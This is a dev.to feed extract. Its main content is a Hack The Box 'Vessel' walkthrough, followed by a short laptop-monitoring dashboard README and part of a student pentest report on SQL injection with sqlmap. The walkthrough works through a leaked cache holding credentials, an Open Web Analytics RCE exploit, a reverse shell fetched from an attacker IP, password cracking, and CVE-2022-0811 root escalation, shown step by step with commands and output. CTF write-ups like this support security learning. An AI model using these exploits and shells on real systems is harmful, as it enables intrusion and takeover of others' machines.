O:8:"owa_user":5:{s:4:"name";s:9:"base.user";s:10:"properties";a:10:{s:2:"id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:1:"1";s:9:"data_type";s:6:"SERIAL";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:7:"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"admin";s:9:"data_type";s:12:"VARCHAR(255)";s:11:"foreign_key";N;s:14:"is_primary_key";b:1;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:8:"password";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:60:"$2y$10$seT74YJuo1hsZgXS4UCYFOMogk95iQzGkCR9YjXoUAOg7w.dwumzO";s:9:"data_type";s:12:"VARCHAR(255)";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:4:"role";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"admin";s:9:"data_type";s:12:"VARCHAR(255)";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:9:"real_name";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:13:"default 
admin";s:9:"data_type";s:12:"VARCHAR(255)";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:13:"email_address";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:16:"admin@vessel.htb";s:9:"data_type";s:12:"VARCHAR(255)";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:12:"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"56801c66e2a182724800625776088f0e";s:9:"data_type";s:12:"VARCHAR(255)";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:13:"creation_date";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:10:"1650211659";s:9:"data_type";s:6:"BIGINT";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:16:"last_update_date";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:10:"1650211659";s:9:"data_type";s:6:"BIGINT";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}s:7:"api_key";O:12:"owa_dbColumn":11:{s:4:"name";s:7:"api_key";s:5:"value";s:32:"a390cc0247ecada9a2b8d2338b9ca6d2";s:9:"data_type";s:12:"VARCHAR(255)";s:11:"foreign_key";N;s:14:"is_primary_key";b:0;s:14:"auto_increment";b:0;s:9:"is_unique";b:0;s:11:"is_not_null";b:0;s:5:"label";N;s:5:"index";N;s:13:"default_value";N;}}s:16:"_tableProperties";a:4:{s:5:"alias";s:4:"user";s:4:"name";s:8:"owa_user";s:9:"cacheable";b:1;s:23:"cache_expiration_period";i:604800;}s:12:"wasPersisted";b:1;s:5:"cache";N;}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;The password hash can be read from the cache, but it cannot be cracked. However, there is also a temp_passkey, which can be used with the base.usersChangePassword action to change the account's password:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://openwebanalytics.vessel.htb/index.php?owa_do=base.usersChangePassword
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Inspect the form to find the name of the hidden field used for this request: owa_k.&lt;/li&gt;
&lt;li&gt;Remove the hidden property, paste the temp_passkey into the field, then change the password.&lt;/li&gt;
&lt;li&gt;Now you should be able to log in to the admin account using the newly set password.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  FOOTHOLD
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Once logged in as admin, there is a PoC that exploits the settings page: &lt;a href="https://github.com/watchdog2000/cve-2022-24637_open-web-analytics-info-disclosure-to-rce"&gt;https://github.com/watchdog2000/cve-2022-24637_open-web-analytics-info-disclosure-to-rce&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;For details about how this exploit works, read the second vulnerability on &lt;a href="https://devel0pment.de/?p=2494#vuln2"&gt;https://devel0pment.de/?p=2494#vuln2&lt;/a&gt;. Basically, the configuration update lacks restrictions on which settings can be changed, so it can be used to set a different base.error_log_file (which can be a PHP file) and a different logging level, base.error_log_level.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;gt; python3 cve-2022-24637.py -u http://openwebanalytics.vessel.htb/ -U admin -P test123
[+] - Found cache url: http://openwebanalytics.vessel.htb//owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php
[+] - Downloaded cache
[+] - Found passkey: c849df0b12c44d26568c2be0e99e4862
[+] - Changed password of user admin to 'test123'
[+] - Submitted update for log file, ready for RCE...
SHELL&amp;gt; id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Note that this shell is very unstable, so it is better to upgrade to a more stable shell.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;gt; cp /usr/share/webshells/php/php-reverse-shell.php w.php
# change the IP and port
# in the owa rce shell
SHELL&amp;gt; wget http://10.10.16.59/w.php
# run a nc listener and browse to http://openwebanalytics.vessel.htb/owa-data/logs/w.php in the browser

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Once a better shell has been received:&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  REVERSE ENG
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;There is a passwordGenerator under /home/steven; this appears to be a Windows executable.&lt;/li&gt;
&lt;li&gt;There are also a PNG and a PDF file under /home/steven/.notes/
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/home/steven/.notes/screenshot.png
/home/steven/.notes/notes.pdf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;The notes.pdf file is password protected, and screenshot.png shows the password complexity settings used to generate the password.&lt;/li&gt;
&lt;li&gt;Coming back to passwordGenerator: this is a 32-bit Windows PE file compiled with PyInstaller. To extract its contents, use
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;https://github.com/extremecoders-re/pyinstxtractor
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Note that this tool targets Python 3.7, so to ensure things are extracted correctly you need to install Python 3.7.&lt;/li&gt;
&lt;li&gt;Then install uncompyle6 to decompile the passwordGenerator.pyc file. It is suggested to create a virtualenv for Python 3.7 so that you can always revert when things don't work out.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# install virtualenv and activate
python.exe -m pip install virtualenv
python.exe -m virtualenv env37
env37\Scripts\activate
# extract content
python pyinstxtractor.py passwordGenerator
# decompile
pip install uncompyle6
uncompyle6 passwordGenerator.pyc

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Reading the code, it would seem that there are 32¹²⁸ combinations of passwords; however, running the code on these lines shows that idx will only take a limited number of values, due to how Qt seeds its random number generator.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;qsrand(QTime.currentTime().msec())
password = ''
for i in range(length):
    idx = qrand() % len(charset)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Copy the genPassword code and modify it to make it work stand-alone.&lt;/li&gt;
&lt;li&gt;Then create a while loop to generate passwords; the process becomes extremely slow at around 1000 passwords, because the seed space is exhausted.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from PySide2.QtCore import QTime, qrand, qsrand

def genPassword():
    length = 32
    char = 0
    if char == 0:
        charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&amp;amp;*()_-+={}[]|:;&amp;lt;&amp;gt;,.?'
    elif char == 1:
        charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    elif char == 2:
        charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890'
    password = ''
    try:
        # seed with the current millisecond (0-999): only 1000 possible seeds
        qsrand(QTime.currentTime().msec())
        for i in range(length):
            idx = qrand() % len(charset)
            password += charset[idx]
    except Exception:
        print('error')
    return password

def gen_possible_passes():
    passes = []
    seen = set()
    try:
        while True:
            ps = genPassword()
            if ps not in seen:
                seen.add(ps)
                passes.append(ps)
                print(len(passes))
    except KeyboardInterrupt:
        # Ctrl-C writes everything collected so far to pass.txt
        with open('pass.txt', 'w') as ofile:
            for p in passes:
                ofile.write(p + '\n')

if __name__ == '__main__':
    gen_possible_passes()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Then use the list with pdfcrack; you should get the password.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;gt; pdfcrack -f notes.pdf -w ~/share/passwordGenerator_extracted/pass.txt
PDF version 1.6
Security Handler: Standard
V: 2
R: 3
P: -1028
Length: 128
Encrypted Metadata: True
FileID: c19b3bb1183870f00d63a766a1f80e68
U: 4d57d29e7e0c562c9c6fa56491c4131900000000000000000000000000000000
O: cf30caf66ccc3eabfaf371623215bb8f004d7b8581d68691ca7b800345bc9a86
found user-password: 'YG7Q7RDzA+q&amp;amp;ke~MJ8!yRzoI^VQxSqSS'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Open up the PDF file; it contains Ethan's password.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Dear Steven,
As we discussed since I'm going on vacation you will be in charge of system maintenance. Please
ensure that the system is fully patched and up to date.
Here is my password: b@mPRNSVTjjLKId1T
System Administrator
Ethan
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Log in as ethan to get the user flag.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  PE
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Upload linpeas.sh and run it; it found the following info:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;-rwsr-x--- 1 root   ethan      796K Mar 15 18:18 /usr/bin/pinns (Unknown SUID binary)
[+] Checking if runc is available
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation
runc was found in /usr/sbin/runc, you may be able to escalate privileges with it

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;With some Google searching, this is found to be related to a recent vulnerability: &lt;a href="https://www.crowdstrike.com/blog/cr8escape-new-vulnerability-discovered-in-cri-o-container-engine-cve-2022-0811/"&gt;https://www.crowdstrike.com/blog/cr8escape-new-vulnerability-discovered-in-cri-o-container-engine-cve-2022-0811/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  EXPLOITING CVE-2022-0811
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Follow the steps closely; this is a confusing exploit.&lt;/li&gt;
&lt;li&gt;Note that there is no kubectl, minikube, docker etc. involved in this exploit. You need to understand the concept of CVE-2022-0811 and replicate it using the underlying commands.&lt;/li&gt;
&lt;li&gt;Using pspy64, we can see that there are some scripts that keep deleting files in various folders, so I decided to do my exploit in the /tmp/meow folder.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;2022/08/31 05:28:01 CMD: UID=0    PID=53674  | sudo -u ethan rm -rf /home/ethan/*sh /home/ethan/.*sh /home/ethan/*/*.sh /home/ethan/*/*sh /home/ethan/.*/*sh /home/ethan/.*/.*sh
2022/08/31 05:28:01 CMD: UID=0    PID=53673  | /bin/sh /root/scripts/clean2.sh 
2022/08/31 05:28:01 CMD: UID=0    PID=53672  | /bin/sh -c /root/scripts/clean2.sh 
2022/08/31 05:28:01 CMD: UID=0    PID=53676  | /bin/bash /root/scripts/clean.sh 
2022/08/31 05:28:01 CMD: UID=0    PID=53679  | sudo -u steven rm -rf /home/steven/.notes/.*sh /home/steven/.notes/*sh 
2022/08/31 05:28:01 CMD: UID=1001 PID=53681  | rm -rf /home/steven/.notes/.*sh /home/steven/.notes/*sh 
2022/08/31 05:28:01 CMD: UID=0    PID=53682  | umount /home/ethan/utsns/* /home/ethan/ipcns/* /home/ethan/netns/* /home/ethan/cgroupns/* 
2022/08/31 05:28:01 CMD: UID=0    PID=53683  | umount /home/steven/utsns/* /home/steven/ipcns/* /home/steven/netns/* /home/steven/cgroupns/* 
2022/08/31 05:28:01 CMD: UID=0    PID=53685  | sudo -u ethan rm -rf /home/ethan/utsns /home/ethan/ipcns /home/ethan/netns /home/ethan/cgroupns 
2022/08/31 05:28:01 CMD: UID=1000 PID=53686  | 
2022/08/31 05:28:01 CMD: UID=0    PID=53687  | sudo -u steven rm -rf /home/steven/utsns /home/steven/ipcns /home/steven/netns /home/steven/cgroupns 
2022/08/31 05:28:01 CMD: UID=0    PID=53689  | sudo -u ethan rm /tmp/*.sh 
2022/08/31 05:28:01 CMD: UID=0    PID=53691  | /bin/sh /root/scripts/clean2.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Open &lt;strong&gt;two SSH sessions&lt;/strong&gt; as ethan.
&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  STEP 1
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;In session 1, do the following:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ethan@vessel:~$ mkdir /tmp/meow &amp;amp;&amp;amp; cd /tmp/meow
ethan@vessel:/tmp/meow$ runc spec --rootless
ethan@vessel:/tmp/meow$ mkdir rootfs
ethan@vessel:/tmp/meow$ vi config.json 
############# under mounts section, add the following content
{
    "type": "bind",
    "source": "/",
    "destination": "/",
    "options": [
        "rbind",
        "rw",
        "rprivate"
    ]
},
#############
ethan@vessel:/tmp/meow$ runc --root /tmp/meow run alpine
# you should be in the container now, but this is a read-only filesystem
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  STEP 2
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;In session 2, create a script that sets the SUID bit on /usr/bin/bash:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ethan@vessel:~$ echo -e '#!/bin/sh\nchmod +s /usr/bin/bash' &amp;gt; /tmp/meow/e.sh &amp;amp;&amp;amp; chmod +x /tmp/meow/e.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  STEP 3
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;In session 1, check that the script has been created and is executable:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# ls -ls /tmp/meow
total 16
4 drwx--x--x 2 root root 4096 Aug 31 10:49 alpine
4 -rw-rw-r-- 1 root root 2875 Aug 31 10:49 config.json
4 -rwxrwxr-x 1 root root   33 Aug 31 10:50 e.sh
4 drwxrwxr-x 5 root root 4096 Aug 31 10:48 rootfs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  STEP 4
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;In session 2, use pinns to assign kernel.core_pattern a value so that, upon a core dump, the kernel will execute the script:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ethan@vessel:~$ pinns -d /var/run -f 844aa3c8-2c60-4245-a7df-9e26768ff303 -s 'kernel.shm_rmid_forced=1+kernel.core_pattern=|/tmp/meow/e.sh #' --ipc --net --uts --cgroup
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  STEP 5
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;In &lt;strong&gt;session 1&lt;/strong&gt;, trigger a core dump
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# ulimit -c unlimited
# tail -f /dev/null &amp;amp;
# ps
    PID TTY          TIME CMD
      1 pts/0    00:00:00 sh
     12 pts/0    00:00:00 tail
     13 pts/0    00:00:00 ps
# bash -i
bash: /root/.bashrc: Permission denied
root@runc:/# kill -SIGSEGV 12
root@runc:/# ps
    PID TTY          TIME CMD
      1 pts/0    00:00:00 sh
     14 pts/0    00:00:00 bash
     17 pts/0    00:00:00 ps

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  STEP 6
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;In session 2, check that the SUID bit has been set on /usr/bin/bash, and then start a shell with effective root privileges:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ethan@vessel:~$ ls -ls /usr/bin/bash
1160 -rwsr-sr-x 1 root root 1183448 Apr 18 09:14 /usr/bin/bash
ethan@vessel:~$ bash -p
bash-5.0# cd /root
bash-5.0# cat root.txt

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



</description>
      <category>htb</category>
    </item>
    <item>
      <title>Dashboard for laptop monitoring!!!!</title>
      <dc:creator>Muhammad Usman</dc:creator>
      <pubDate>Fri, 03 Mar 2023 16:13:27 +0000</pubDate>
      <link>https://dev.to/codeninjausman/dashboard-for-laptop-monitoring-1oeo</link>
      <guid>https://dev.to/codeninjausman/dashboard-for-laptop-monitoring-1oeo</guid>
      <description>&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--566lAguM--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/CodeNinjaUsman"&gt;
        CodeNinjaUsman
      &lt;/a&gt; / &lt;a href="https://github.com/CodeNinjaUsman/React-Monitor-"&gt;
        React-Monitor-
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      Cool dashboard for laptop monitoring
    &lt;/h3&gt;
  &lt;/div&gt;
  &lt;div class="ltag-github-body"&gt;
    
&lt;div id="readme" class="md"&gt;
&lt;h1&gt;
React monitor&lt;/h1&gt;
&lt;h2&gt;
Usage&lt;/h2&gt;
&lt;p&gt;This project was bootstrapped with &lt;a href="https://vitejs.dev/" rel="nofollow"&gt;Vite&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;
Project setup&lt;/h3&gt;
&lt;div class="snippet-clipboard-content notranslate position-relative overflow-auto"&gt;&lt;pre class="notranslate"&gt;&lt;code&gt;npm install
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;
Compiles and hot-reloads for development&lt;/h4&gt;
&lt;div class="snippet-clipboard-content notranslate position-relative overflow-auto"&gt;&lt;pre class="notranslate"&gt;&lt;code&gt;npm run dev
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;
Compiles and minifies for production&lt;/h4&gt;
&lt;div class="snippet-clipboard-content notranslate position-relative overflow-auto"&gt;&lt;pre class="notranslate"&gt;&lt;code&gt;npm run build
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;
Terms and License&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Released under the &lt;a href="https://www.gnu.org/licenses/gpl-3.0.html" rel="nofollow"&gt;GPL&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Copyright 2020 &lt;a href="https://cruip.com/" rel="nofollow"&gt;Cruip&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Use it for personal and commercial projects, but please don’t republish, redistribute, or resell the template.&lt;/li&gt;
&lt;li&gt;Attribution is not required, although it is really appreciated.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;



&lt;/div&gt;
&lt;br&gt;
  &lt;div class="gh-btn-container"&gt;&lt;a class="gh-btn" href="https://github.com/CodeNinjaUsman/React-Monitor-"&gt;View on GitHub&lt;/a&gt;&lt;/div&gt;
&lt;br&gt;
&lt;/div&gt;
&lt;br&gt;





&lt;h2&gt;
  
  
  Backend
&lt;/h2&gt;


&lt;h1&gt;
  
  
  Cpu info api
&lt;/h1&gt;





&lt;h1&gt;
  
  
  To save data in db
&lt;/h1&gt;




&lt;h1&gt;
  
  
  Api for recent changes in files
&lt;/h1&gt;


&lt;br&gt;
Run with:&lt;br&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;python watchdog_api.py C:\
python watchdog_flask.py
python cpu_monitor.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h6&gt;
  
  
  Thanks..
&lt;/h6&gt;

&lt;p&gt;&lt;strong&gt;Attribution is not required, although it is really appreciated. 🙏🙏&lt;/strong&gt;&lt;/p&gt;

</description>
      <category>react</category>
      <category>flask</category>
      <category>node</category>
      <category>javascript</category>
    </item>
    <item>
      <title>Hack a Machine</title>
      <dc:creator>Muhammad Usman</dc:creator>
      <pubDate>Sun, 19 Feb 2023 09:20:41 +0000</pubDate>
      <link>https://dev.to/codeninjausman/hack-a-machine-3mh8</link>
      <guid>https://dev.to/codeninjausman/hack-a-machine-3mh8</guid>
      <description>&lt;h2&gt;
  
  
  &lt;strong&gt;Penetration Testing Report of Windows Desktop and CentOS Server&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://download1351.mediafire.com/ig2opor8abng/sb1ldskt9083ypu/Assignment-3+VED+Machines.zip"&gt;Link to machines&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;u&gt;Setting up the Environment&lt;/u&gt;&lt;/strong&gt;&lt;br&gt;
The two machines were opened in VMware. The Desktop machine appears to be a Windows 7-based system, while the Server machine is a CentOS system, as shown in the image below.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--4BjUKoOn--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/648xxkpwdxa8jmt9c07o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--4BjUKoOn--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/648xxkpwdxa8jmt9c07o.png" alt="Machines Look Like" width="512" height="416"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;u&gt;Scanning Phase&lt;/u&gt;&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;Tool Used:&lt;/strong&gt; Angry IP Scanner&lt;br&gt;
Scanning is the phase where we look for open ports on a system or a network. For this exercise, we scanned the entire network and found the CentOS server at IP address 192.168.10.10 along with its open ports. It is evident that port 80 (HTTP), port 22 (SSH) and port 445 (SMB) are open on the CentOS server, which means a web application is likely running on the server.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--UvoSkvRY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/z233d70qzd2bnugsxza3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--UvoSkvRY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/z233d70qzd2bnugsxza3.png" alt="Angry Ip Scanner result" width="512" height="216"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;u&gt;&lt;strong&gt;Checking the Server Web Application on Port 80&lt;/strong&gt;&lt;/u&gt;&lt;br&gt;
Since port 80 was open on the CentOS server, as highlighted in the scanning phase, we accessed the web application running there, as shown in the image below. We used the Firefox browser because it allows HTTP requests to be modified, which is helpful in later stages.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--kG3rgl1Q--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9bij4jg27qeuldj59655.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--kG3rgl1Q--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9bij4jg27qeuldj59655.png" alt="Coping Post Data" width="512" height="288"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Moreover, we inspected the page source in order to capture the POST request by supplying dummy data to the website. As depicted in the image below, we entered mbrown in the username field and sdsda in the password field. Although the password is wrong, capturing the POST request is important for launching further attacks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;u&gt;Running SQLMap on Captured Post Requests&lt;/u&gt;&lt;/strong&gt;&lt;br&gt;
After capturing the POST request, we ran the SQLMap tool on it in order to harvest details about the database, its tables, columns and fields, as shown in the image below. SQLMap finds SQL injection vulnerabilities in web pages, where a malicious SQL query inserted into a user input field is passed on to the database and returns further information to the attacker. The web service running on the CentOS server was found to be vulnerable to SQL injection attacks.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--b2M4W3RL--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xkzlalc60qzt2ruvnvp8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--b2M4W3RL--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xkzlalc60qzt2ruvnvp8.png" alt="Sql injection" width="512" height="251"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After getting the table details, SQLMap then shows the credentials as shown below.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--86w5xs5D--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bri7sn208ovca2vhub67.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--86w5xs5D--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bri7sn208ovca2vhub67.png" alt="Credentials" width="512" height="375"&gt;&lt;/a&gt;&lt;/p&gt;

